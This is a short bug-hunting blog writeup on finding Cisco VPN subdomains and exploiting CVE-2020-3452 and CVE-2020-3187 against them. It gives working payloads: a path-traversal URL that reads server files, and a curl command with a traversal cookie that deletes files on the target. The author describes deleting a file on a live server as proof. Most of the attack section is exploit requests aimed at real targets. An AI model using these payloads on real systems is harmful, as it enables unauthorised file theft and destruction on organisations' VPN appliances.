Hunting for CVE: 2020–3187 , 2020–3452

Back with another writeup. In this I will be discussing about how easy is to hunt for CVE:2020–3187&, 2020-3452 and what are the steps involved in it.

NOTE: For this we need to focus on subdomains of targets which are working on Cisco VPN.

Let’s Start

Finding Subdomains: Sublist3r , AssetFinder , Amass

I simply used above tools to find the subdomains and saved the entire result in .txt file.

Now extract the sub domains which all are having VPN keyword in it.

Example: vpn.example.com , vpn-us-east-1.example.com

So, on visiting these kinds of sub domains I got

Now, Reload the above page and capture the request in BurpSuite as shown below

CVE:2020–3452

Modify the Request URL with : +CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

and we can read the content of the files as shown in the response.

CVE:2020–3187

In , this we are able to delete the files.

I deleted the logo file present on the server so as to make the PoC instead of deleting any other important file.

Below is the image which confirms the presence of file on the server.

Now, to delete this just hit the following command on your terminals.

curl -H “Cookie: token=../+CSCOU+/csco_logo.gif” https://target/+CSCOE+/session_password.html

After, this the file was deleted from the server

Thanks for reading!!